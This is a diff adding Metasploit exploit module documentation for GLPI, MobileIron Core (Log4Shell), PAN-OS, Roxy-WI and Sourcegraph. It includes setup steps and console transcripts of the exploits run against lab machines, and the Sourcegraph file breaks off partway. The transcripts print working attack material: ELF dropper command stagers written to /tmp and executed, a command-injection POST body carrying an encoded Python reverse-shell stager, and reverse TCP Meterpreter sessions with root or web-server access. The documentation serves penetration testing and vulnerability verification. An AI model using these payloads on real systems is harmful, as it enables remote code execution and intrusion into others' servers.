+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   10.5.132.190     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH  /glpi/glpi/      no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.109     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux (Dropper)
+
+
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
+
+[*] Started reverse TCP handler on 10.5.135.109:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] token = 4578e2880dfc8091a10c38ea60ead228
+[*] sid = vitn15j8j9f0lljrfu7daq9es8
+[+] The target appears to be vulnerable.
+[*] Executing Linux (Dropper) for linux/x64/meterpreter/reverse_tcp
+[*] Generated command stager: ["printf '\\177\\105\\114\\106\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\76\\0\\1\\0\\0\\0\\170\\0\\100\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\70\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\7\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\372\\0\\0\\0\\0\\0\\0\\0\\174\\1\\0\\0\\0\\0\\0\\0\\0\\20\\0\\0\\0\\0\\0\\0\\110\\61\\377\\152\\11\\130\\231\\266\\20\\110\\211\\326\\115\\61\\311\\152\\42\\101\\132\\262\\7\\17\\5\\110\\205\\300\\170\\121\\152\\12\\101\\131\\120\\152\\51\\130\\231\\152\\2\\137\\152\\1\\136\\17\\5\\110\\205\\300\\170\\73\\110\\227\\110\\271\\2\\0\\21\\134\\12\\5\\207\\155\\121\\110\\211\\346\\152\\20\\132\\152\\52\\130\\17\\5\\131\\110\\205\\300\\171\\45\\111\\377\\311\\164\\30\\127\\152\\43\\130\\152\\0\\152\\5\\110\\211\\347\\110\\61\\366\\17\\5\\131\\131\\137\\110\\205\\300\\171\\307\\152\\74\\130\\152\\1\\137\\17\\5\\136\\152\\176\\132\\17\\5\\110\\205\\300\\170\\355\\377\\346'>>/tmp/bLaTw ; chmod +x /tmp/bLaTw ; /tmp/bLaTw ; rm -f /tmp/bLaTw"]
+[*] execute_command
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 10.5.132.190
+[*] Command Stager progress - 100.00% done (809/809 bytes)
+[*] Meterpreter session 4 opened (10.5.135.109:4444 -> 10.5.132.190:36378) at 2022-10-19 17:05:28 -0500
+
+meterpreter > sysinfo
+Computer     : 10.5.132.190
+OS           : Ubuntu 20.04 (Linux 5.15.0-52-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+```
+
+#### Unix Command
+```
+[*] 10.5.132.190 - Meterpreter session 4 closed.  Reason: Died
+smsf6 exploit(linux/http/glpi_htmlawed_php_injection) > set target 0
+target => 0
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set payload cmd/unix/python/meterpreter/reverse_tcp
+payload => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
+
+[*] Started reverse TCP handler on 10.5.135.109:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] token = 154f788cf9a685dac8753df78c6c3a1c
+[*] sid = 1mcp7n5vq9v6tnqlbm324qk9ce
+[+] The target appears to be vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] execute_command
+[*] Sending stage (40168 bytes) to 10.5.132.190
+[*] Meterpreter session 5 opened (10.5.135.109:4444 -> 10.5.132.190:39622) at 2022-10-19 17:06:36 -0500
+
+meterpreter > sysinfo
+Computer        : ubuntu-20041
+OS              : Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+### Description
+MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
+will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
+command execution in the context of the tomcat user.
+
+This module will start an LDAP server that the target will need to connect to.
+
+### Setup
+Once MobileIron Core is installed, no configuration needs to take place. The application is vulnerable out of the box.
+
+### MobileIron Core Appliance ISO Installation on VMWare Fusion
+
+1. Obtain a `mobileiron-##.#.#.#-##.iso` file, the following steps utilize `mobileiron-10.6.0.0-23.iso`.
+2. Use the ISO to create "A New Virtual Machine".
+3. Customize the VM settings to your liking. I gave the VM 4gb RAM, 4 cores, and changed the network adapter to a bridged mode
+so that I can hit it over the network.
+4. Boot the new virtual machine.
+5. Type `vm-install` at the `boot:` prompt.
+6. Wait patiently while the VM reboots and begins the install process. The system *will* reboot when installation completes.
+7. When prompted with `Continue with configuration dialog?`, type `yes`
+8. Type `q` to clear the license from the screen.
+9. Accept the End User License Agreement by typing `yes`
+10. Enter a Company Name / contact / email of your choosing. They don't matter.
+11. Configure an enable password (e.g. `Labpass1`)
+12. Enter an admin user name (e.g. `albinolobster`)
+13. Enter and confirm an admin password (e.g. `Labpass1`)
+14. Select `a` for the management interface
+15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`)
+16. Enter your test networks default gateway (e.g. `10.9.49.1`)
+17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a
+static DNS enty to my lab network's router.
+18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`)
+19. Enter blank entries for name server 2 and 3.
+20. `yes` to enable remote shell access (why not, right?)
+21. `no` to configuring NTP
+22. `no` to configuring system clock
+23. `yes` to commit changes
+24. Type `reload` to restart the system and `yes`, when prompted, to both saving the configuration and proceeding with the reload
+25. When the system has restarted, you should now have a vulnerable install of MobileIron Core.
+26. Visit `https://ipaddr` to ensure the HTTP server has fully loaded
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/http/mobileiron_core_log4shell`
+3. Set the `RHOSTS`, `LHOST`, and `SRVHOST`
+4. Do: `run`
+5. If the target is vulnerable, the payload should be executed
+
+## Options
+
+## Scenarios
+
+### MobileIron Core 11.2.0.0-31
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.100
+RHOSTS => 10.9.49.100
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.100:48004) at 2022-07-29 09:46:14 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux hackercat.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### MobileIron Core 10.6.0.0-23
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.101
+RHOSTS => 10.9.49.101
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.101:35304) at 2022-07-29 10:19:58 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux lobster.example.com 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 10.9.49.101 - Command shell session 1 closed.
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
+< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
+Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
+user inputs in the "op" request allows an attacker to inject commands.
+
+A Palo Alto Firewall demo VM can be requested at the following
+[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
+next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
+administrator password.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/panos_auth_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### PAN-OS 10.0.0
+```
+msf6 > use linux/http/panos_auth_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
+rhosts => 192.168.2.196
+msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
+PASSWORD => N0tpassword!
+msf6 exploit(linux/http/panos_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.114:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating...
+[+] Successfully obtained api key
+[+] The target is vulnerable.
+[*] Exploiting...
+[*] Sending stage (989032 bytes) to 192.168.2.196
+[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
+[*] Command Stager progress - 100.00% done (1111/1111 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : PA-VM-10-0-0.home
+OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,392 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0.
+Successful exploitation results in remote code execution under the context of the web server user.
+
+Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
+
+### Setup
+
+Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
+
+First grab a vulnerable copy of the code from the release pages at https://github.com/hap-wi/roxy-wi/releases.
+You will likely want to grab version 6.1.0.0 from https://github.com/hap-wi/roxy-wi/archive/refs/tags/v6.1.0.0.tar.gz
+
+Next follow the installation instructions at https://roxy-wi.org/installation.py#manual and be sure to replace `apache`
+with `www-data` where applicable if your using Debian or Ubuntu (they call this out in their instructions however
+it can be a bit hard to find which is why I'm noting it here).
+
+Once you are done you should have a working copy of Roxy-Wi. Note that for some reason the login page didn't work for me
+in testing, however everything needed to test this module should be set up and operating as expected.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/roxy_wi_exec`
+4. Set `RHOST` to the address of the target Roxy-WI machine.
+5. Set `LHOST` to the address of your attacking machine.
+8. Run `exploit`
+9. Do: `run`
+10. You should get a shell as the user running the Roxy-WI server.
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### TARGETURI
+
+The base path to Roxy-WI. The default value is `/`.
+
+## Scenarios
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Unix In-Memory Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=iufmgha&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 18:46:55 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 760
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20echo%20exec\%28__import__\%28\%27base64\%27\%29.b64decode\%28__import__\%28\%27codecs\%27\%29.getencoder\%28\%27utf-8\%27\%29\%28\%27aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yMi4yMzAuMTQ1Jyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc%2bSScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK\%27\%29\%5b0\%5d\%29\%29%20%7c%20exec%20%24%28which%20python%20%7c%7c%20which%20python3%20%7c%7c%20which%20python2%29%20-%20%3b%23&alert_consumer=gumovpt&backend_server=127.0.0.1
+    [*] Sending stage (40164 bytes) to 172.22.230.145
+    [*] Meterpreter session 1 opened (172.22.230.145:4444 -> 172.22.230.145:41506) at 2022-07-25 13:46:56 -0500
+    ####################
+    # Response:
+    ####################
+    No response received
+    
+    meterpreter > getuid
+    Server username: www-data
+    meterpreter > sysinfo
+    Computer     : gwillcox-Virtual-Machine
+    OS           : Linux 5.15.0-41-generic #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022
+    Architecture : x64
+    Meterpreter  : python/linux
+    meterpreter > pwd
+    /var/www/haproxy-wi/app
+    meterpreter > ls
+    Listing: /var/www/haproxy-wi/app
+    ================================
+    
+    Mode              Size    Type  Last modified              Name
+    ----              ----    ----  -------------              ----
+    100664/rw-rw-r--  83      fil   2022-06-30 02:43:57 -0500  .htaccess
+    040755/rwxr-xr-x  4096    dir   2022-07-25 13:36:33 -0500  __pycache__
+    100775/rwxrwxr-x  12822   fil   2022-06-30 02:43:57 -0500  add.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  certs
+    100775/rwxrwxr-x  4745    fil   2022-06-30 02:43:57 -0500  config.py
+    100775/rwxrwxr-x  33194   fil   2022-06-30 02:43:57 -0500  create_db.py
+    100775/rwxrwxr-x  14945   fil   2022-06-30 02:43:57 -0500  db_model.py
+    100775/rwxrwxr-x  64688   fil   2022-06-30 02:43:57 -0500  funct.py
+    100775/rwxrwxr-x  913     fil   2022-06-30 02:43:57 -0500  ha.py
+    100775/rwxrwxr-x  8544    fil   2022-06-30 02:43:57 -0500  hapservers.py
+    100775/rwxrwxr-x  3008    fil   2022-06-30 02:43:57 -0500  history.py
+    100775/rwxrwxr-x  7145    fil   2022-06-30 02:43:57 -0500  login.py
+    100775/rwxrwxr-x  1696    fil   2022-06-30 02:43:57 -0500  logs.py
+    100775/rwxrwxr-x  1598    fil   2022-06-30 02:43:57 -0500  metrics.py
+    100775/rwxrwxr-x  966     fil   2022-06-30 02:43:57 -0500  nettools.py
+    100775/rwxrwxr-x  181104  fil   2022-06-30 02:43:57 -0500  options.py
+    100775/rwxrwxr-x  4096    fil   2022-06-30 02:43:57 -0500  overview.py
+    100775/rwxrwxr-x  1884    fil   2022-06-30 02:43:57 -0500  portscanner.py
+    100775/rwxrwxr-x  1125    fil   2022-06-30 02:43:57 -0500  provisioning.py
+    100644/rw-r--r--  274432  fil   2022-07-25 13:41:13 -0500  roxy-wi.db
+    100775/rwxrwxr-x  750     fil   2022-06-30 02:43:57 -0500  runtimeapi.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  scripts
+    100775/rwxrwxr-x  2486    fil   2022-06-30 02:43:57 -0500  sections.py
+    100775/rwxrwxr-x  1580    fil   2022-06-30 02:43:57 -0500  servers.py
+    100775/rwxrwxr-x  1826    fil   2022-06-30 02:43:57 -0500  smon.py
+    100775/rwxrwxr-x  103924  fil   2022-06-30 02:43:57 -0500  sql.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  templates
+    100775/rwxrwxr-x  1361    fil   2022-06-30 02:43:57 -0500  users.py
+    100775/rwxrwxr-x  4150    fil   2022-06-30 02:43:57 -0500  versions.py
+    100775/rwxrwxr-x  2076    fil   2022-06-30 02:43:57 -0500  viewlogs.py
+    100775/rwxrwxr-x  1150    fil   2022-06-30 02:43:57 -0500  viewsttats.py
+    100775/rwxrwxr-x  1819    fil   2022-06-30 02:43:57 -0500  waf.py
+    
+    meterpreter > 
+```
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux Dropper Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > set Target 1 
+    Target => 1
+    msf6 exploit(linux/http/roxy_wi_exec) > set payload linux/x64/shell/reverse_tcp 
+    payload => linux/x64/shell/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (linux/x64/shell/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       1   Linux (Dropper)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=oodqhqe&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 19:07:53 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 939
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20printf%20%27\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\372\0\0\0\0\0\0\0\174\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\121\152\12\101\131\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\254\26\346\221\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\152\46\132\17\5\110\205\300\170\355\377\346%27%3e%3e/tmp/olXCy%20%3b%20chmod%20%2bx%20/tmp/olXCy%20%3b%20/tmp/olXCy%20%3b%20rm%20-f%20/tmp/olXCy%20%3b%23&alert_consumer=kvlkaqe&backend_server=127.0.0.1
+    [*] Sending stage (38 bytes) to 172.22.230.145
+    [*] Command shell session 2 opened (172.22.230.145:4444 -> 172.22.230.145:41508) at 2022-07-25 14:07:59 -0500
+    i####################
+    # Response:
+    ####################
+    No response received
+    d[*] Command Stager progress - 100.00% done (810/810 bytes)
+    
+    id
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    whoami
+    www-data
+    pwd
+    /var/www/haproxy-wi/app
+    ls
+    __pycache__
+    add.py
+    certs
+    config.py
+    create_db.py
+    db_model.py
+    funct.py
+    ha.py
+    hapservers.py
+    history.py
+    login.py
+    logs.py
+    metrics.py
+    nettools.py
+    options.py
+    overview.py
+    portscanner.py
+    provisioning.py
+    roxy-wi.db
+    runtimeapi.py
+    scripts
+    sections.py
+    servers.py
+    smon.py
+    sql.py
+    templates
+    users.py
+    versions.py
+    viewlogs.py
+    viewsttats.py
+    waf.py
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute
+arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can
+then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a
+feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the
+commands that are able to be executed through the git exec REST API.
+
+The cloned repositories can be enumerated from the `/list` endpoint using the curl command:
+`curl http://$target:3178/list?cloned=true`
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application (see detailed Docker Installation section below)
+2. Start msfconsole
+3. Do: `use exploits/linux/http/sourcegraph_gitserver_sshcmd`
+4. Set the `RHOSTS`, `PAYLOAD` and any payload related options that are necessary
+5. Do: `run`
+
+### Docker Installation
+1. Run the following command to start the all-inclusive docker container for Sourcegraph v3.36.3.
+
+    ```
+    docker run \
+      --publish 3178:3178 \
+      --publish 7080:7080 \
